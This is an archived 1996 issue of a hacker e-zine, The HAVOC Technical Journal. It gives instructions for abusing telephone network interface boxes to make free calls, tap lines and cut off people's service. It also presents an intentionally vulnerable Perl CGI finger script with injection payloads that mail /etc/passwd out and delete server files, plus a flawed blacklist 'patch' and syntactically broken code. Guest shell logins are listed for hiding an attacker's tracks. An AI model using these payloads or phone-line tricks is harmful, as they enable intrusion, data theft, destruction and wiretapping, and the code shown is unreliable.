Power Hacker 2003

home *** CD-ROM | disk | FTP | other *** search

/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / thtj / thtj4.txt < prev next >

Wrap

Text File | 2002-05-27 | 10.5 KB | 281 lines

╒══════════════════════════════════════════════════════════════════╕ │The HAVOC Technical Journal │▒ └──────────────────────────────────────────────────────────────────┘▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ Vol. 1 | No.4 | October 1st, 1996 | A HAVOC Bell Systems Publication "Protected by the First Amendment" _____________________________________________________________________________ Inside this issue: Whats new this issue..............................A Editorial......................................... l The Network Identification Device Pt. 1........... l Writting Inscure CGI Progs........................ The End of penet.fi............................... b ROLL CALL & more!................................. y Next Month........................................ Scud-O (I need more writers!!! e-mail me if ya want to write an article! my e-mail is: FoxMulder@worldnet.att.net (yes its back up..) the mags e-mail is: thtj@juno.com (wheee.. we get to read ads as we get your e-mail!) ) This months music supplied by: Sublime, The Future Sound of London and Zion Train and Violent Femmes. Oh yea.. and WHFS 99.1 ! What's new in this issue: Well if you weren't so cheap you would see our nice new format! but the online version has none of that neatness.. My new school has a lab with a scanner so the print version should get some nice pics soon... Also Scud-O is now on IRC often.. Im on #phreak and #hacker often on undernet.. to c'mon in and join us for a chat... If ya want a print version and some extra goodies... e-mail me! ----------------------------------------------------------- How to contact us: Check Out Our Web Site: www.geocities.com/SiliconValley/8805/ my (Scud-O) e-mail is : FoxMulder@worldnet.att.net our Mag e-mail is : thtj@juno.com HELLCORE's e-mail is : hellcore@juno.com --------------------------------------------------------------- Editorial: by Scud-O Well another month another issue.. but hey if ya had the print version you would see our nice new format.. its kind of slick... were still messing around so it can only get better...Welp on to bigger and other things... lately i've been hit with ALOT of lamers.. (I gots ops on #hacker, thats why) (sometimes on #phreak as well...) well anyway.. EVERY lamer on #hacker was like 'teach me' so i relpied 'on what?' they came back with 'everything' so i said 'get some manuals and RTFM' and they all replied 'what?' .. people this is PATHETIC!! We need to protect ourselves from these newbies! any suggestions? e-me: FoxMulder@worldnet.att.net The Network Identification Device (NID) Pt.1 by Scud-O These days it seems that NIDs have been left unabused when they are a great device to mess with. Why you ask? Well, there are many things you can to with them. But first where can you find them? well every house has one! My house has an old one, but most new ones I see are the size of a sunglass case which have a 7/16 inch socket screw in them. There are also some bigger ones ( usually in houseing complexes) that have a user opening and a telco opening. A little history: The NID was created to for test purposes. The NID is the main connection from Bell to the houses lines. You can test this NID to see if Bells lines are fucked or if your lines are fucked. If you live in Bell Atlantic area, their White Pages have some info on NIDS. Back to the article: The NID can be used for many purposes: 1. Free phone calls: Inside the NID there is a jack and a plug. If you unplug the jack and stick a phone in the plug you can then make calls free of charge, but the lines restrictions still apply (900 block, call waiting, etc) To find the line number just use your trusty ANI. And since the jack in the NID is out, the customer can't interupt you and make a call. Or you can find a 2 jack to one converter (they sell em in Radio Shack.. its so you can put more than one phone in a jack) and plug it all together so they can still make calls. 2. Phone tap: This is just a modification of the 2 to 1 jack converter, just wait for a call.. you cant leave the phone off the hook.. well because it will go off the hook... (hmm... maybe next month I'll find out how to be able to listen 24 hours a day...) 3. Disconnect customer: did some one piss you off? we just open their NID and unplug the jack and leave... no service... it will take a few days to get service and they are just totally fucked then... hehehehehehe... Next Month: read as I steal a NID and slice and dice it!! also: more fun tricks! Writting Insecure CGI Progs: by Scud-O CGI programs really are wonderful.. you can easily give them information that we shouldn't have! What follows is a simple CGI prog that you can install to get the servers password file! The program is actually a finger gateway.. but who cares.. next month or maybe this month I'll print the secure source code to show a webmaster or sysadmin... Here's the HTML code: <FORM ACTION="/cgi-bin/finger.pl" METHOD="POST"> <INPUT TYPE="text" NAME="user" SIZE=40> <INPUT TYPE="submit" VALUE="Get Information"> </FORM> Here's the actual CGI Perl Prog: #!/usr/local/bin/perl &parse_form_data(*simple); $user = $simple{'user'}; print "Content-type: text/plain", "\n\n"; print "Here are the results of your query: "\n"; print '/usr/local/bin/finger $user'; print "\n"; exit (0); the parse_form_data sub: (NOTE: ya need this to trasnlater the info for both progs.. other wise ya fucked! ) sub parse_form_data { local(*FORM_DATA) = @_; local( $request_method, $query_string, @key_value_pairs, $key_value, $key, $value); $request_method = $ENV('REQUEST_METHOD'); if ($request_method eg "GET") { $query_string = $ENV{'QUERY_STRING'}; } elsif ($request_method eg "POST") { $query_string = $ENV{'CONTENT_LENGTH'}; } else { &return_error (500, "Server Error', "Server uses unsupported method"); } @key_value_pairs = split (/&/, $query_string); foreach $key_value (@key_value_pairs) { ($key, $value) = split (/=/, $key_value); $value =~ tr/+/ /; $value =~ s/%([\dA-Fa-f][\dA-Fa-f])/pack ("C", hex ($1))/eg; if (defined($FORM_DATA{$key})) { $FORM_DATA{$key} = join("\0", $FORM_DATA{$key}, $value); } else { $FORM_DATA{$key} = $value; } } the return_error sub: (NOTE: ya need this for the parse sub, and the patched version! ) sub return_error { local($status, $keyword, $message) =@_; print "Content-type: text/html", "\n"; print "Status: ", $status, " ", $keyword, "\n\n"; print << End_of_Error; <title>Unexpected Error!</title> <h1>$keyword</h1> <hr>$message</hr> Please contact $webmater for more information. End_of_Error exit(1); } So thats it! below is the patched source: #!/usr/local/bin/perl &parse_form_data(*simple); $user = $simple{'user'}; if($user =~ /[;><&\*'\|]) { &return_error(500, "CGI Finger Alert", "What are you trying to do?"); } else { print "Content-type: text/plain", "\n\n"; print "Here are the results of your query: "\n"; print '/usr/local/bin/finger $user'; print "\n"; } exit (0); So what you aske.. we the first one if you type: ; mail -s "passwords!" you@yourdomain.com < /etc/passwd then you get yourslef a copy of the server's password lists being mailed to you! or try: ; rm * and delete their directory of files! The End of penet.fi : by Scud-O Well the pressure was finally too much, as penet.fi will no longer give out anonymous e-mail. But the people that already have addresses can still send stuff. But newsgroup post aren't allowed anymore... but you can still get anon news posts. So what will happen? well I think hacking penet emails will be fun for a while, but we will all start getting Juno accounts.. the're free you can forge them, and they are dissposible, but you have to read e-mail, click thru a list of hobbies, etc, and more and then your e-mails get adds in them... oh well though... ROLL CALL & More! Who is HAVOC? Scud-O : Pope boy Psycho : Fag Vice Pope Pinky : In hidding Rotten : Moving fool Sid : Other Moving Fool (and the're twins as well! ) Want to join? next month we got a sign up sheet! Cool People: |\|\cFill theLURK7R (sometimes theLURK3R ) JKMG-Boba ( aka Boba) Alef all on IRC! This Month Question: We ask why has |)eadLoss\Mulder changed his name? Well.. some knew me as |)eadLoss , some as Mulder, so I combined the 2.. but people we ever more confused, so I said fuck em! and I changed it to Scud-O .. Scud-O is a cool guy.. Next Month's Question: Who is Scud-O ? Next Month: This MANY be what we will have in issue 5 We have more on the NID Virus Theory Pt.2 More Virus Stuff RTFM: The lamer Journal Whats up in the HELLCORE Labs? Pager Talk AND MUCH MORE TBA ! Issue 5 is out Oct. 31st! cya ya next issue! -Scud-O Wait! we have a bonus: Some shell accounts to use to cover your ass: Freenet accounts: login freenet.buffalo.edu guest freenet.hsc.colorado.edu guest heartland.bradley.edu bbguest freenet.lorain.oberlin.edu guest freenet.victoria.bc.ca guest cbos.uc.edu visitor yfn.ysu.edu visitor freenet-in-a.cwru.edu fnguest b c ------------------------ Okay that is all! ============================================================ = IS this copy of The HAVOC Technical Journal Skunked? = If this file reads larger than 11078 bytes than this issue = has been messed with! get a fresh copy from our site: = www.geocities.com/SiliconValley/8805/ ============================================================